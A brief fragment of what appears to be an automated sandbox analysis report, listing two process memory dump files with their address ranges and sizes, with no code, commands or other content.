                                                        • memory/3752-110-0x000002C00B840000-0x000002C00B862000-memory.dmp

                                                          Filesize

                                                          136KB

                                                        • memory/5112-233-0x00000229ECA50000-0x00000229ECA58000-memory.dmp

                                                          Filesize

                                                          32KB